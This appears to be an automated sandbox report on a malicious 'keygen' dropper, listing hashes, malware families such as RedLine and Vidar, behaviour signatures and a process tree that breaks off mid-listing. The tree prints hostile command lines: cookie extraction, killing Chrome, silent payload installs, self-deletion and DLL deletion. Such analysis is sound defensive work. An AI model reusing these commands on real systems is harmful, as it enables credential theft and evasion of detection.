Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    47s
  • max time network
    1797s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 15:44

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 22 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 27 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 26 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 26 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 8 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:296
    • C:\Users\Admin\AppData\Roaming\whtuhgr
      C:\Users\Admin\AppData\Roaming\whtuhgr
      2⤵
        PID:7224
        • C:\Users\Admin\AppData\Roaming\whtuhgr
          C:\Users\Admin\AppData\Roaming\whtuhgr
          3⤵
            PID:7416
        • C:\Users\Admin\AppData\Roaming\whtuhgr
          C:\Users\Admin\AppData\Roaming\whtuhgr
          2⤵
            PID:7760
            • C:\Users\Admin\AppData\Roaming\whtuhgr
              C:\Users\Admin\AppData\Roaming\whtuhgr
              3⤵
                PID:7564
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1292
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1216
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1900
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1088
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:352
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                        1⤵
                          PID:2536
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2572
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                          1⤵
                            PID:2820
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2800
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                            1⤵
                              PID:2748
                            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1040
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                                2⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:1672
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  3⤵
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:188
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3344
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3724
                                • C:\Users\Admin\AppData\Local\Temp\is-69EID.tmp\Install.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-69EID.tmp\Install.tmp" /SL5="$40192,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:4072
                                  • C:\Users\Admin\AppData\Local\Temp\is-26J1E.tmp\Ultra.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-26J1E.tmp\Ultra.exe" /S /UID=burnerch1
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Drops file in Program Files directory
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:908
                                    • C:\Program Files\Windows Photo Viewer\UDLZNTNMXX\ultramediaburner.exe
                                      "C:\Program Files\Windows Photo Viewer\UDLZNTNMXX\ultramediaburner.exe" /VERYSILENT
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:1200
                                      • C:\Users\Admin\AppData\Local\Temp\is-CIKKV.tmp\ultramediaburner.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-CIKKV.tmp\ultramediaburner.tmp" /SL5="$701D4,281924,62464,C:\Program Files\Windows Photo Viewer\UDLZNTNMXX\ultramediaburner.exe" /VERYSILENT
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of WriteProcessMemory
                                        PID:2828
                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2052
                                    • C:\Users\Admin\AppData\Local\Temp\61-5da75-f32-274a9-2cb058ee3192d\Rulaehubype.exe
                                      "C:\Users\Admin\AppData\Local\Temp\61-5da75-f32-274a9-2cb058ee3192d\Rulaehubype.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:648
                                    • C:\Users\Admin\AppData\Local\Temp\c5-e2b2d-f0a-4c28e-19c50b283c424\Bolaecafaefa.exe
                                      "C:\Users\Admin\AppData\Local\Temp\c5-e2b2d-f0a-4c28e-19c50b283c424\Bolaecafaefa.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of WriteProcessMemory
                                      PID:2192
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxy43ich.x1q\sskiper.exe /s & exit
                                        6⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:5064
                                        • C:\Users\Admin\AppData\Local\Temp\fxy43ich.x1q\sskiper.exe
                                          C:\Users\Admin\AppData\Local\Temp\fxy43ich.x1q\sskiper.exe /s
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2316
                                          • C:\Users\Admin\AppData\Local\Temp\490961535.exe
                                            C:\Users\Admin\AppData\Local\Temp\490961535.exe
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4972
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              9⤵
                                              • Executes dropped EXE
                                              PID:5320
                                          • C:\Users\Admin\AppData\Local\Temp\1367816643.exe
                                            C:\Users\Admin\AppData\Local\Temp\1367816643.exe
                                            8⤵
                                              PID:6016
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\fxy43ich.x1q\sskiper.exe & exit
                                              8⤵
                                                PID:4476
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 0
                                                  9⤵
                                                  • Runs ping.exe
                                                  PID:2280
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5kgojkc1.t1p\KiffMainE1.exe & exit
                                            6⤵
                                              PID:4780
                                              • C:\Users\Admin\AppData\Local\Temp\5kgojkc1.t1p\KiffMainE1.exe
                                                C:\Users\Admin\AppData\Local\Temp\5kgojkc1.t1p\KiffMainE1.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4992
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1ztypvk.jjj\001.exe & exit
                                              6⤵
                                                PID:3036
                                                • C:\Users\Admin\AppData\Local\Temp\q1ztypvk.jjj\001.exe
                                                  C:\Users\Admin\AppData\Local\Temp\q1ztypvk.jjj\001.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4772
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p2s15oxf.hha\installer.exe /qn CAMPAIGN="654" & exit
                                                6⤵
                                                  PID:188
                                                  • C:\Users\Admin\AppData\Local\Temp\p2s15oxf.hha\installer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\p2s15oxf.hha\installer.exe /qn CAMPAIGN="654"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4964
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\p2s15oxf.hha\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\p2s15oxf.hha\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619891255 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                      8⤵
                                                        PID:4396
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svbe0wru.b4n\gpooe.exe & exit
                                                    6⤵
                                                      PID:5084
                                                      • C:\Users\Admin\AppData\Local\Temp\svbe0wru.b4n\gpooe.exe
                                                        C:\Users\Admin\AppData\Local\Temp\svbe0wru.b4n\gpooe.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:4212
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                            PID:5320
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                              PID:512
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                                PID:6568
                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                  PID:7264
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5cdb41ur.b30\sskiper.exe /s & exit
                                                              6⤵
                                                                PID:5244
                                                                • C:\Users\Admin\AppData\Local\Temp\5cdb41ur.b30\sskiper.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\5cdb41ur.b30\sskiper.exe /s
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5304
                                                                  • C:\Users\Admin\AppData\Local\Temp\590025586.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\590025586.exe
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:5768
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      9⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4780
                                                                  • C:\Users\Admin\AppData\Local\Temp\1912429569.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\1912429569.exe
                                                                    8⤵
                                                                      PID:5780
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\5cdb41ur.b30\sskiper.exe & exit
                                                                      8⤵
                                                                        PID:4108
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping 0
                                                                          9⤵
                                                                          • Runs ping.exe
                                                                          PID:4520
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ldzk2skq.ol5\google-game.exe & exit
                                                                    6⤵
                                                                      PID:5856
                                                                      • C:\Users\Admin\AppData\Local\Temp\ldzk2skq.ol5\google-game.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\ldzk2skq.ol5\google-game.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5928
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                          8⤵
                                                                            PID:6040
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\crw04luy.2yd\askinstall39.exe & exit
                                                                        6⤵
                                                                          PID:3164
                                                                          • C:\Users\Admin\AppData\Local\Temp\crw04luy.2yd\askinstall39.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\crw04luy.2yd\askinstall39.exe
                                                                            7⤵
                                                                              PID:5420
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                8⤵
                                                                                  PID:5184
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im chrome.exe
                                                                                    9⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5976
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g42tpums.li5\y1.exe & exit
                                                                              6⤵
                                                                                PID:5808
                                                                                • C:\Users\Admin\AppData\Local\Temp\g42tpums.li5\y1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\g42tpums.li5\y1.exe
                                                                                  7⤵
                                                                                    PID:3968
                                                                                    • C:\Users\Admin\AppData\Local\Temp\KF4qgCCQhk.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\KF4qgCCQhk.exe"
                                                                                      8⤵
                                                                                        PID:5876
                                                                                        • C:\Users\Admin\AppData\Roaming\1620150624108.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\1620150624108.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620150624108.txt"
                                                                                          9⤵
                                                                                            PID:4188
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\KF4qgCCQhk.exe"
                                                                                            9⤵
                                                                                              PID:5660
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1 -n 3
                                                                                                10⤵
                                                                                                • Runs ping.exe
                                                                                                PID:5716
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\g42tpums.li5\y1.exe"
                                                                                            8⤵
                                                                                              PID:4324
                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                timeout /T 10 /NOBREAK
                                                                                                9⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:5988
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4poc4or5.03b\setup.exe & exit
                                                                                          6⤵
                                                                                            PID:6108
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4poc4or5.03b\setup.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\4poc4or5.03b\setup.exe
                                                                                              7⤵
                                                                                                PID:5184
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4poc4or5.03b\setup.exe"
                                                                                                  8⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  PID:4992
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                    9⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:5972
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1svlbwp1.3d3\toolspab1.exe & exit
                                                                                              6⤵
                                                                                                PID:5256
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1svlbwp1.3d3\toolspab1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\1svlbwp1.3d3\toolspab1.exe
                                                                                                  7⤵
                                                                                                    PID:512
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1svlbwp1.3d3\toolspab1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\1svlbwp1.3d3\toolspab1.exe
                                                                                                      8⤵
                                                                                                        PID:1872
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\brwswec4.0mw\GcleanerWW.exe /mixone & exit
                                                                                                    6⤵
                                                                                                      PID:424
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4d5qr3rb.40o\SunLabsPlayer.exe /S & exit
                                                                                                      6⤵
                                                                                                        PID:5136
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4d5qr3rb.40o\SunLabsPlayer.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\4d5qr3rb.40o\SunLabsPlayer.exe /S
                                                                                                          7⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Modifies registry class
                                                                                                          PID:6040
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5CE8.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:4856
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5CE8.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:6808
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5CE8.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:6532
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5CE8.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:5200
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5CE8.tmp\tempfile.ps1"
                                                                                                                    8⤵
                                                                                                                      PID:4044
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5CE8.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                        PID:1212
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5CE8.tmp\tempfile.ps1"
                                                                                                                        8⤵
                                                                                                                          PID:6496
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z4uirncd.2mo\005.exe & exit
                                                                                                                      6⤵
                                                                                                                        PID:6068
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\z4uirncd.2mo\005.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\z4uirncd.2mo\005.exe
                                                                                                                          7⤵
                                                                                                                            PID:5916
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g35jmxjq.d0y\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:512
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\g35jmxjq.d0y\Setup3310.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\g35jmxjq.d0y\Setup3310.exe /Verysilent /subid=623
                                                                                                                            7⤵
                                                                                                                              PID:6064
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-7A03E.tmp\Setup3310.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-7A03E.tmp\Setup3310.tmp" /SL5="$103B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\g35jmxjq.d0y\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                8⤵
                                                                                                                                  PID:5868
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-FU0TL.tmp\Setup.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-FU0TL.tmp\Setup.exe" /Verysilent
                                                                                                                                    9⤵
                                                                                                                                      PID:3892
                                                                                                                                      • C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"
                                                                                                                                        10⤵
                                                                                                                                          PID:912
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            11⤵
                                                                                                                                              PID:2856
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                              11⤵
                                                                                                                                                PID:6412
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                11⤵
                                                                                                                                                  PID:7396
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  11⤵
                                                                                                                                                    PID:2216
                                                                                                                                                • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"
                                                                                                                                                  10⤵
                                                                                                                                                    PID:5940
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                      11⤵
                                                                                                                                                        PID:6164
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /im RunWW.exe /f
                                                                                                                                                          12⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:6196
                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                          timeout /t 6
                                                                                                                                                          12⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:6004
                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"
                                                                                                                                                      10⤵
                                                                                                                                                        PID:5408
                                                                                                                                                      • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:5148
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-96HTL.tmp\LabPicV3.tmp
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-96HTL.tmp\LabPicV3.tmp" /SL5="$4037C,506127,422400,C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                                                                                                                                                            11⤵
                                                                                                                                                              PID:1816
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-CFPUS.tmp\3316505.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-CFPUS.tmp\3316505.exe" /S /UID=lab214
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:4820
                                                                                                                                                                  • C:\Program Files\Java\JLCOFVXOWP\prolab.exe
